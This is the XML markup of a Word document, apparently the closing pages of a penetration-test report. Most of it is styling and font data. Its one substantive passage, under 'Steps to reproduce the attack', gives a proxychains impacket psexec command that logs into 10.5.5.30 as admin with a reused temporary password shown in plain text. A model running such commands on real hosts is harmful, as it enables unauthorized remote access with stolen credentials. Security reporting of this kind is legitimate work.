            <w:bookmarkEnd w:id="90"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t xml:space="preserve"> John was able to reuse a temporary password that the administrator left for Alex.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:shd w:val="clear" w:fill="D9D9D9"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>└─</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py admin:</w:t>
            </w:r>
            <w:hyperlink r:id="rId43" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
                </w:rPr>
                <w:t>UWyBGeTp3Bhw7f@10.5.5.30</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="31">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="2515870"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="37" name="Image38"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38" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="2515870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="91" w:name="__RefHeading___Toc5491_4118114545"/>
            <w:bookmarkStart w:id="92" w:name="_Toc151462891"/>
            <w:bookmarkStart w:id="93" w:name="_Toc92992259"/>
            <w:bookmarkEnd w:id="91"/>
            <w:r>
              <w:rPr/>
              <w:t>Post-Exploitation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="92"/>
            <w:bookmarkEnd w:id="93"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>System Proof Screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5232400" cy="2959100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="38" name="Picture 10" descr=""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descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5232400" cy="2959100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="1770" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId46"/>
      <w:headerReference w:type="default" r:id="rId47"/>
      <w:headerReference w:type="first" r:id="rId48"/>
      <w:footerReference w:type="even" r:id="rId49"/>
      <w:footerReference w:type="default" r:id="rId50"/>
      <w:footerReference w:type="first" r:id="rId51"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:left="1440" w:right="1440" w:gutter="0" w:header="720" w:top="1440" w:footer="720" w:bottom="1440"/>
      <w:pgNumType w:fmt="decimal"/>
      <w:formProt w:val="false"/>
      <w:textDirection w:val="lrTb"/>
      <w:docGrid w:type="default" w:linePitch="600" w:charSpace="32768"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:font w:name="Times New Roman">
    <w:charset w:val="00" w:characterSet="windows-1252"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial">
    <w:charset w:val="00" w:characterSet="windows-1252"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Serif">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Times New Roman">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Helvetica Neue">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="DejaVu Serif">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="DejaVu Sans">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:charset w:val="01"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>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keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>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top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9340" w:leader="none"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t xml:space="preserve">| </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="DefaultParagraphFont"/>
        <w:color w:val="808080"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
  </w:p>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Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9340" w:leader="none"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t xml:space="preserve">| </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="DefaultParagraphFont"/>
        <w:color w:val="808080"/>
      </w:rPr>
      <w:t>Page</w:t>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keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>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tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9340" w:leader="none"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="center"/>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Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9340" w:leader="none"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>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abstractNum w:abstractNumId="1">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:pStyle w:val="Heading1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:pStyle w:val="Heading2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:pStyle w:val="Heading3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:pStyle w:val="Heading4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"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1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="144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2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="216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3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"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4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="360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5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="432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6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"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7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="576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lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:hint="default"/>
        <w:smallCaps w:val="false"/>
        <w:caps w:val="false"/>
        <w:dstrike w:val="false"/>
        <w:strike w:val="false"/>
        <w:vertAlign w:val="baseline"/>
        <w:position w:val="0"/>
        <w:sz w:val="20"/>
        <w:sz w:val="20"/>
        <w:spacing w:val="0"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:kern w:val="0"/>
        <w:iCs w:val="false"/>
        <w:bCs w:val="false"/>
        <w:w w:val="100"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="3"/>
  </w:num>
</w:numbering>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:zoom w:percent="95"/>
  <w:defaultTabStop w:val="720"/>
  <w:autoHyphenation w:val="true"/>
  <w:compat>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/>
  </w:compat>
  <w:themeFontLang w:val=""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Arial Unicode MS" w:cs="Times New Roman"/>
        <w:lang w:val="en-ZA" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
      </w:rPr>
